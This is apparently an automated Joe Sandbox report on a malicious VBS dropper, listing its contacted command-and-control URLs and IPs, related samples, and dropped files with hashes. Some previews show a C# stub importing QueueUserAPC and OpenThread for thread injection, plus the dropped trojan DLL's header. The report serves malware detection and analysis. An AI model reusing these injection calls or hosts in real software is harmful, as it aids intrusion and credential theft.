http://crl.m5 | powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | false | | high
http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low
http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P | rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://atl.bigbigpoppa.com/t | rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | false | | high

                                Contacted IPs


                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.251.90.253 | art.microsoftsofymicrosoftsoft.at | Russian Federation | 35278 | SPRINTHOSTRU | true

                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 481077
Start date: 10.09.2021
Start time: 09:53:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 12s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 345678.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winVBS@29/21@5/1
EGA Information:
• Successful, ratio: 80%
HDC Information:
• Successful, ratio: 19.7% (good quality ratio 18.8%)
• Quality average: 80.3%
• Quality standard deviation: 28.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 173
• Number of non-executed functions: 206
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .vbs
• Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 23.211.4.86, 20.50.102.62, 40.112.88.60, 20.82.210.154, 80.67.82.211, 80.67.82.235, 20.54.110.249
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Execution Graph export aborted for target mshta.exe, PID 6556 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

Time | Type | Description
09:56:22 | API Interceptor | 1x Sleep call for process: wscript.exe modified
09:57:01 | API Interceptor | 3x Sleep call for process: rundll32.exe modified
09:57:12 | API Interceptor | 44x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

Match | Associated Sample Name / URL | Detection
185.251.90.253 | start[526268].vbs | malicious
185.251.90.253 | URS8.VBS | malicious
185.251.90.253 | documentation_446618.vbs | malicious
185.251.90.253 | start_information[754877].vbs | malicious
185.251.90.253 | start[873316].vbs | malicious
185.251.90.253 | documentation[979729].vbs | malicious
185.251.90.253 | run_documentation[820479].vbs | malicious
185.251.90.253 | run[476167].vbs | malicious
185.251.90.253 | run_presentation[645872].vbs | malicious
185.251.90.253 | documentation[979729].vbs | malicious

                                                    Domains

Match | Associated Sample Name / URL | Detection | Context
resolver1.opendns.com | start[526268].vbs | malicious | 208.67.222.222
resolver1.opendns.com | documentation_446618.vbs | malicious | 208.67.222.222
resolver1.opendns.com | start[873316].vbs | malicious | 208.67.222.222
resolver1.opendns.com | 6bI5jJ1oIXeI.vbs | malicious | 208.67.222.222
resolver1.opendns.com | nostalgia.dll | malicious | 208.67.222.222
resolver1.opendns.com | Lbh0K9szYgv5.vbs | malicious | 208.67.222.222
resolver1.opendns.com | ursi.vbs | malicious | 208.67.222.222
resolver1.opendns.com | OcEyzBswGm.exe | malicious | 208.67.222.222
resolver1.opendns.com | u0So5MG5rkxx.vbs | malicious | 208.67.222.222
resolver1.opendns.com | PIfkvZ5Gh6PO.vbs | malicious | 208.67.222.222
resolver1.opendns.com | Ry1j2eCohwtN.vbs | malicious | 208.67.222.222
resolver1.opendns.com | Invoice778465.xlsb | malicious | 208.67.222.222
resolver1.opendns.com | 9uHDrMnFYKhh.vbs | malicious | 208.67.222.222
resolver1.opendns.com | ursnif.vbs | malicious | 208.67.222.222
resolver1.opendns.com | 8ph6zaHVzRpV.vbs | malicious | 208.67.222.222
resolver1.opendns.com | Cetu9U5nJ7Fc.vbs | malicious | 208.67.222.222
resolver1.opendns.com | vntfeq.dll | malicious | 208.67.222.222
resolver1.opendns.com | 231231232.dll | malicious | 208.67.222.222
resolver1.opendns.com | gbgr.dll | malicious | 208.67.222.222
resolver1.opendns.com | B9C23PuJnfNI.vbs | malicious | 208.67.222.222
art.microsoftsofymicrosoftsoft.at | start[526268].vbs | malicious | 185.251.90.253
art.microsoftsofymicrosoftsoft.at | documentation_446618.vbs | malicious | 185.251.90.253
art.microsoftsofymicrosoftsoft.at | start[873316].vbs | malicious | 185.251.90.253
art.microsoftsofymicrosoftsoft.at | 6bI5jJ1oIXeI.vbs | malicious | 194.226.139.129
art.microsoftsofymicrosoftsoft.at | nostalgia.dll | malicious | 194.226.139.129
art.microsoftsofymicrosoftsoft.at | Lbh0K9szYgv5.vbs | malicious | 194.226.139.129
art.microsoftsofymicrosoftsoft.at | ursi.vbs | malicious | 193.187.173.154
art.microsoftsofymicrosoftsoft.at | u0So5MG5rkxx.vbs | malicious | 193.187.173.154
art.microsoftsofymicrosoftsoft.at | PIfkvZ5Gh6PO.vbs | malicious |
                                                    Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    Invoice778465.xlsbGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    9uHDrMnFYKhh.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    ursnif.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    8ph6zaHVzRpV.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    Cetu9U5nJ7Fc.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    vntfeq.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    231231232.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    gbgr.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    B9C23PuJnfNI.vbsGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    payment_verification_99351.vbsGet hashmaliciousBrowse
                                                    • 95.181.163.74

                                                    ASN

                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                    SPRINTHOSTRU | start[526268].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    ZaRfpqeOYY.apk | Get hash | malicious | Browse | 141.8.192.169
                                                    URS8.VBS | Get hash | malicious | Browse | 185.251.90.253
                                                    h4AjR43abb.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    documentation_446618.vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    start_information[754877].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    dAmDdz0YVv.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    start[873316].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    documentation[979729].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    run_documentation[820479].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    run[476167].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    run_presentation[645872].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    yXf9mhlpKV.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    mgdL2TD6Dg.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    documentation[979729].vbs | Get hash | malicious | Browse | 185.251.90.253
                                                    Pi2KyLAg44.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    oClF50dZRG.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    2K5KXrsoLH.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    1fbm3cYMWh.exe | Get hash | malicious | Browse | 185.251.88.208
                                                    SecuriteInfo.com.PyInstaller.29419.exe | Get hash | malicious | Browse | 141.8.197.42

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                    C:\Users\user\AppData\Local\Temp\fum.cpp | start[526268].vbs | Get hash | malicious | Browse |

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11606
                                                      Entropy (8bit):4.883977562702998
                                                      Encrypted:false
                                                      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                      Malicious:false
                                                      Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1192
                                                      Entropy (8bit):5.325275554903011
                                                      Encrypted:false
                                                      SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
                                                      MD5:C85C42A32E22DE29393FCCCCF3BBA96E
                                                      SHA1:EAF3755C63061C96400536041D4F4EB8BC66E99E
                                                      SHA-256:9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
                                                      SHA-512:7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
                                                      Malicious:false
                                                      Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      C:\Users\user\AppData\Local\Temp\RES36.tmp
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2184
                                                      Entropy (8bit):2.6945378022733095
                                                      Encrypted:false
                                                      SSDEEP:24:p6lalX0tlHMhKdNfI+ycuZhNzakS1PNnq9qpTMe9Ep:oG0tl+Kd91ulza3vq9j
                                                      MD5:67D9FD76B1560E756AD75887E896950E
                                                      SHA1:0A201C6BF0CDDBB1EEF5BB2F9946DF0C7F35BD81
                                                      SHA-256:15A6D69E837873D682E156749CA9950DEB0C2FAEDD4175C31477DF99A579CE18
                                                      SHA-512:53AD6E2F2B82E1AA7E47DA93965260A0BF38968FB9983D5B1479A85FD8B69479438BD8CA297C2421F9A0718499141112FC4494E09F389D8D91574496F63F1A42
                                                      Malicious:false
                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP.................;...i...._ ...........3.......C:\Users\user\AppData\Local\Temp\RES36.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\RESCC9.tmp
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2184
                                                      Entropy (8bit):2.705169992336164
                                                      Encrypted:false
                                                      SSDEEP:24:p6UKZHyhKdNNI+ycuZhNLakSdPNnq9qpjge9Ep:oUcoKd31ulLa3Hq93
                                                      MD5:AD4994FD8A9585256C18E9B844191482
                                                      SHA1:2EAB28A5E5342E81133D259DCEDC57FACA2D949F
                                                      SHA-256:AFC3875D94C4E29878351FB25DDA3B9A99D875390799A76A02757A3A03D3ABAB
                                                      SHA-512:EC164EAE0A976E9CDA5FBA6E19A0BE5B5D7BBD72BC5A2C4368D6443F6CDB9229A72763A86E9327D2F604A810D9EC8FB3E2D784E60C51B3B465FE518F382452B2
                                                      Malicious:false
                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP................/.uc...g...H.a..........4.......C:\Users\user\AppData\Local\Temp\RESCC9.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nmonbo0.fmq.ps1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erjsbakl.1hx.psm1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\adobe.url
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):108
                                                      Entropy (8bit):4.699454908123665
                                                      Encrypted:false
                                                      SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                      MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                      SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                      SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                      SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                      Malicious:false
                                                      Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                      C:\Users\user\AppData\Local\Temp\fum.cpp
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):387072
                                                      Entropy (8bit):6.617827225958404
                                                      Encrypted:false
                                                      SSDEEP:6144:kZv2xLg5Ema5+kMLdcW2Ipsk0AOIjlllll/lllllWQO+XK+Mtw:kn5AUkaqIpWylllll/lllll7O+XLMtw
                                                      MD5:D48EBF7B31EDDA518CA13F71E876FFB3
                                                      SHA1:C72880C38C6F1A013AA52D032FC712DC63FE29F1
                                                      SHA-256:8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                                                      SHA-512:59CBBD4ADA4F51650380989A6A024600BB67982255E9F8FFBED14D3A723471B02DAF53A0A05B2E6664FF35CB4C224F9B209FB476D6709A7B33F0A9C060973FB8
                                                      Malicious:true
                                                      Joe Sandbox View:
                                                      • Filename: start[526268].vbs, Detection: malicious, Browse
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8st.8st.8st....st...9st...#st...+st.8su..st...2st...?st...9st...st...9st...9st.Rich8st.........................PE..L......Y...........!.....,..........9........@......................................%O....@.................................p...d................................%..`...T...............................@............@...............................text....*.......,.................. ..`.rdata...~...@.......0..............@..@.data...............................@....gfids..............................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.090185700011949
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryR3ak7YnqqAgPN5Dlq5J:+RI+ycuZhNzakS1PNnqX
                                                      MD5:EFE23BEC9FC9B5E06916A1BE875F2003
                                                      SHA1:AF5821C4AC138EB6603B162CC68A6B929E12AFAA
                                                      SHA-256:C507871D331678835BC859C11396AFD243A7794985E149FFC87E91788A3039B5
                                                      SHA-512:0FD67127250317FE9CBA42851AC9D2565CE3853106DA0AB9858CEFA613661B65673EDFA701C1BAFBDAD2AE7C43070BF52C5E782B23E672D59E8126DEAE0899C8
                                                      Malicious:false
                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.i.t.t.4.j.3.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.i.t.t.4.j.3.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.0.cs
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text
                                                      Category:dropped
                                                      Size (bytes):398
                                                      Entropy (8bit):4.993655904789625
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                      MD5:C08AF9BD048D4864677C506B609F368E
                                                      SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                      SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                      SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                      Malicious:false
                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):371
                                                      Entropy (8bit):5.205848361570366
                                                      Encrypted:false
                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f9hPSjpS10zxs7+AEszI923f9hPSjpSP:p37Lvkmb6KzlIsqWZE2lIsP
                                                      MD5:9DFAD308AAA65D3C504CDF0B6F6C5A1A
                                                      SHA1:6E84AFA7A3652A64E3A5684011033FE3A45D28A5
                                                      SHA-256:EFA017E7C4068EC32A47BAA962BEAB8FA2E03ECEDE4644C05C676B913474EF3B
                                                      SHA-512:359A219143C27AED23CBEBB49C7573C94A61DC1E790AF87FFF00B77792A30744F926261EC60788E41F72958CB45F15AA0BED3EA6DA79C227C6F9FAED480F8192
                                                      Malicious:true
                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.0.cs"
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3584
                                                      Entropy (8bit):2.5809984345905286
                                                      Encrypted:false
                                                      SSDEEP:24:etGSVE/u2Dg85lxlok3Jgpi14MatkZfVNaUI+ycuZhNzakS1PNnq:6VtWb5lxF15JV11ulza3vq
                                                      MD5:DC9112D5FC4166AF941AC2400F1F2705
                                                      SHA1:A616BE6EE9692637A445D6AD46A5B6626DBC0C79
                                                      SHA-256:D3ACE842F1DB9073CE19ACCA01B55070664DF123D8EE965585D158533F665AA5
                                                      SHA-512:E0DF2FC3FF232BC2DC56BF58628A44D6856EEC709916AACF22BFDC5C3B2DFF46A8B110F12B3DFB7E5BA8C1D627832FC969992379254674E9AE6658ABF24D0A5E
                                                      Malicious:false
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.;a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.uitt4j30.dll.stkml.W32.mscorlib.Sy
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.out
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):412
                                                      Entropy (8bit):4.871364761010112
                                                      Encrypted:false
                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                      Malicious:false
                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
